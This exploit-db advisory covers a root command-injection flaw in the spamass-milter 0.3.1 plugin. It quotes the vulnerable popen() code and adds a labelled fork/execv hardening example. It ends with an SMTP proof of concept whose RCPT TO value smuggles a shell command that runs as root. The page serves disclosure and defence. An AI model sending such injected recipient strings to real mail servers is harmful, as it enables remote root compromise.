Apache SpamAssassin Milter Plugin 0.3.1 – Remote Command Execution

  • Author: kingcope
    Date: 2010-03-09
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/11662/
  • Description: The Spamassassin Milter plugin suffers from a remote root command execution vulnerability. Full exploit details provided.
    Author: Kingcope
    
    Spamassassin Milter Plugin Remote Root Zeroday (BTW zerodays lurk in the
    shadows not HERE)
    aka the postfix_joker advisory
    
    Logic fuckup?
    
    March 07 2010 // if you read this 10 years later you are definitely
    seeking the nice 0days!
    
    Greetz fly out to alex,andi,adize :D
    +++ KEEP IT ULTRA PRIV8 +++
    
    Software
    +-+-+-+-+
    Apache Spamassassin
    SpamAssassin is a mail filter which attempts to identify spam using
    a variety of mechanisms including text analysis, Bayesian filtering,
    DNS blocklists, and collaborative filtering databases.
    
    SpamAssassin is a project of the Apache Software Foundation (ASF).
    
    Postfix
    What is Postfix? It is Wietse Venema's mailer that started life at IBM
    research as an alternative to the widely-used Sendmail program.
    Postfix attempts to be fast, easy to administer, and secure.
    The outside has a definite Sendmail-ish flavor, but the inside is
    completely different.
    
    Spamassassin Milter
    A little plugin for the Sendmail Milter (Mail Filter) library
    that pipes all incoming mail (including things received by rmail/UUCP)
    through the SpamAssassin, a highly customizable SpamFilter.
    
    Remote Code Execution Vulnerability
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    
    The Spamassassin Milter Plugin can be tricked into executing any command
    as the root user remotely.
    If spamass-milter is run with the expand flag (-x option), it builds a
    shell command line that embeds the attacker-supplied recipient (RCPT TO)
    and hands it to popen().
    
    From spamass-milter-0.3.1 (latest), line 820:
    
    //
    // Gets called once for each recipient
    //
    // stores the first recipient in the spamassassin object and
    // stores all addresses and the number thereof (some redundancy)
    //

    sfsistat
    mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)
    {
        struct context *sctx = (struct context*)smfi_getpriv(ctx);
        SpamAssassin* assassin = sctx->assassin;
        FILE *p;
    #if defined(__FreeBSD__)
        int rv;
    #endif

        debug(D_FUNC, "mlfi_envrcpt: enter");

        if (flag_expand)
        {
            /* open a pipe to sendmail so we can do address
               expansion */

            char buf[1024];
            char *fmt="%s -bv \"%s\" 2>&1";

    #if defined(HAVE_SNPRINTF)
            snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);
    #else
            /* XXX possible buffer overflow here // is this a joke ?! */
            sprintf(buf, fmt, SENDMAIL, envrcpt[0]);
    #endif

            debug(D_RCPT, "calling %s", buf);

    #if defined(__FreeBSD__) /* popen bug - see PR bin/50770 */
            rv = pthread_mutex_lock(&popen_mutex);
            if (rv)
            {
                debug(D_ALWAYS, "Could not lock popen mutex: %s", strerror(rv));
                abort();
            }
    #endif

            p = popen(buf, "r");                                   [1]
            if (!p)
            {
                debug(D_RCPT, "popen failed(%s).Will not expand aliases", strerror(errno));
                assassin->expandedrcpt.push_back(envrcpt[0]);
    
    
    [1] the vulnerable popen() call.
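    The fix for a popen() like [1] is to stop going through /bin/sh at all: pass the recipient as a single argv element to sendmail via fork()/execv(), and reject addresses with characters an address never needs. The block below is an added example written for this page, not spamass-milter code; run_noshell, rcpt_is_clean and expand_demo are hypothetical names, and /bin/echo stands in for "sendmail -bv" so it can be run anywhere.

```c
#include <ctype.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Defence in depth (hypothetical helper): only allow characters an address needs. */
int rcpt_is_clean(const char *s)
{
    if (!s || !*s) return 0;
    for (; *s; s++)
        if (!isalnum((unsigned char)*s) && !strchr("@.+-_", *s))
            return 0;
    return 1;
}

/* Hardened replacement for popen(): exec path with argv directly (no /bin/sh),
 * capturing the child's stdout+stderr into out. Returns bytes read or -1. */
ssize_t run_noshell(const char *path, char *const argv[], char *out, size_t outlen)
{
    int fds[2];
    if (pipe(fds) == -1)
        return -1;
    pid_t pid = fork();
    if (pid == -1)
        return -1;
    if (pid == 0) {                             /* child: wire output to the pipe */
        dup2(fds[1], STDOUT_FILENO);
        dup2(fds[1], STDERR_FILENO);
        close(fds[0]); close(fds[1]);
        execv(path, argv);                      /* argv passed verbatim, never parsed */
        _exit(127);
    }
    close(fds[1]);                              /* parent: collect child output */
    size_t used = 0;
    ssize_t n;
    while (used + 1 < outlen && (n = read(fds[0], out + used, outlen - used - 1)) > 0)
        used += (size_t)n;
    out[used] = '\0';
    close(fds[0]);
    waitpid(pid, NULL, 0);
    return (ssize_t)used;
}

/* Demo: the advisory's RCPT TO value handed to /bin/echo (standing in for
 * "sendmail -bv") comes back as one literal argument; nothing after '|' runs. */
ssize_t expand_demo(char *out, size_t outlen)
{
    char *const argv[] = { "/bin/echo", "root+:\"|touch /tmp/foo\"", NULL };
    return run_noshell("/bin/echo", argv, out, outlen);
}
```

    In the real daemon the argv would be { SENDMAIL, "-bv", envrcpt[0], NULL }, and rcpt_is_clean() should gate the call before it is made.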
    
    Remote Root Exploit PoC through postfix
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    
    $ nc localhost 25
    220 ownthabox ESMTP Postfix (Ubuntu)
    mail from: me@me.com
    250 2.1.0 Ok
    rcpt to: root+:"|touch /tmp/foo"
    250 2.1.5 Ok
    
    $ ls -la /tmp/foo
    -rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo
    
    Signed,
    
    Kingcope